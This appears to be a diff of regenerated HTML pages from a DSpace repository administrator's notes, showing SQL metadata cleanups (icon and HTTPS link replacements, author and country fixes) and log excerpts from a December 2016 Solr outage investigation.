dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
</code></pre><ul>
<li>Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)</li>
<li>And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc</li>
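<li>Finding those should be the same pattern as the icon cleanup above, for example (a sketch using Twitter; the other domains would get the same treatment):
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%http://twitter.com%';
</code></pre>
</li>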
@ -291,7 +291,7 @@ dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;i
<ul>
<li>Run Font Awesome fixes on DSpace Test:</li>
</ul>
<pre><code>dspace=# \i /tmp/font-awesome-text-replace.sql
<pre tabindex="0"><code>dspace=# \i /tmp/font-awesome-text-replace.sql
UPDATE 17
UPDATE 17
UPDATE 3
@ -321,9 +321,9 @@ UPDATE 0
<ul>
<li>Fix some messed up authors on CGSpace:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;799da1d8-22f3-43f5-8233-3d2ef5ebf8a8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Charleston, B.%&#39;;
UPDATE 10
dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
dspace=# update metadatavalue set authority=&#39;e936f5c5-343d-4c46-aa91-7a1fff6277ed&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Knight-Jones%&#39;;
UPDATE 36
</code></pre><ul>
<li>I updated the authority index but nothing seemed to change, so I&rsquo;ll wait and do it again after I update Discovery below</li>
@ -332,23 +332,23 @@ UPDATE 36
<li>Talk to Carlos Quiros about CG Core metadata in CGSpace</li>
<li>Get a list of countries from CGSpace so I can do some batch corrections:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=228 group by text_value order by count desc) to /tmp/countries.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=228 group by text_value order by count desc) to /tmp/countries.csv with csv;
</code></pre><ul>
<li>Fix a bunch of countries in Open Refine and run the corrections on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t &#39;correct&#39; -m 228 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Run a shit ton of author fixes from Peter Ballantyne that we&rsquo;ve been cleaning up for two months:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-pb2.csv -f dc.contributor.author -t correct -m 3 -u dspace -d dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-pb2.csv -f dc.contributor.author -t correct -m 3 -u dspace -d dspace -p fuuu
</code></pre><ul>
<li>Run a few URL corrections for ilri.org and doi.org, etc:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://www.ilri.org&#39;,&#39;https://www.ilri.org&#39;) where resource_type_id=2 and text_value like &#39;%http://www.ilri.org%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://mahider.ilri.org&#39;, &#39;https://cgspace.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://mahider.%.org%&#39; and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://dx.doi.org%&#39; and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://doi.org%&#39; and metadata_field_id not in (18,26,28,111);
</code></pre><ul>
<li>I skipped metadata fields like citation and description</li>
</ul>
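<ul>
<li>To double check which fields those excluded IDs (18, 26, 28, 111) actually are, something like this against the field registry should work (a sketch):</li>
</ul>
<pre tabindex="0"><code>dspace=# select metadata_field_id, element, qualifier from metadatafieldregistry where metadata_field_id in (18,26,28,111);
</code></pre>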
@ -372,15 +372,15 @@ dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http:
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

@ -12,11 +12,11 @@
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
I&rsquo;ve raised a ticket with Atmire to ask
@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
I&rsquo;ve raised a ticket with Atmire to ask
Another worrying error from dspace.log is:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ Another worrying error from dspace.log is:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -128,7 +128,7 @@ Another worrying error from dspace.log is:
<time datetime="2016-12-02T10:43:00+03:00">Fri Dec 02, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -137,17 +137,17 @@ Another worrying error from dspace.log is:
<li>CGSpace was down for five hours in the morning while I was sleeping</li>
<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
</ul>
<pre><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
</code></pre><ul>
<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
<li>Another worrying error from dspace.log is:</li>
</ul>
<pre><code>org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
<pre tabindex="0"><code>org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
</code></pre><ul>
<li>The first error I see in dspace.log this morning is:</li>
</ul>
<pre><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&quot;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&quot;
<pre tabindex="0"><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&#34;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&#34;
org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
</code></pre><ul>
<li>Looking through DSpace&rsquo;s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries</li>
<li>The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:</li>
</ul>
<pre><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&quot;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&quot;++AND+subject_mtdt:&quot;PARTNERSHIPS&quot;+AND+subject_mtdt:&quot;RESEARCH&quot;+AND+subject_mtdt:&quot;AGRICULTURE&quot;+AND+subject_mtdt:&quot;DEVELOPMENT&quot;++AND+iso_mtdt:&quot;en&quot;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
<pre tabindex="0"><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&#34;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&#34;++AND+subject_mtdt:&#34;PARTNERSHIPS&#34;+AND+subject_mtdt:&#34;RESEARCH&#34;+AND+subject_mtdt:&#34;AGRICULTURE&#34;+AND+subject_mtdt:&#34;DEVELOPMENT&#34;++AND+iso_mtdt:&#34;en&#34;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
2016-12-02 08:28:23,908 INFO org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
</code></pre><ul>
<li>DSpace&rsquo;s own Solr logs don&rsquo;t give IP addresses, so I will have to enable Nginx&rsquo;s logging of <code>/solr</code> so I can see where this request came from</li>
@ -255,7 +255,7 @@ org.apache.solr.client.solrj.SolrServerException: Server refused connection at:
<li>I got a weird report from the CGSpace checksum checker this morning</li>
<li>It says 732 bitstreams have potential issues, for example:</li>
</ul>
<pre><code>------------------------------------------------
<pre tabindex="0"><code>------------------------------------------------
Bitstream Id = 6
Process Start Date = Dec 4, 2016
Process End Date = Dec 4, 2016
@ -278,8 +278,8 @@ Result = The bitstream could not be found
<li>For what it&rsquo;s worth, there is no item on DSpace Test or S3 backups with that checksum either&hellip;</li>
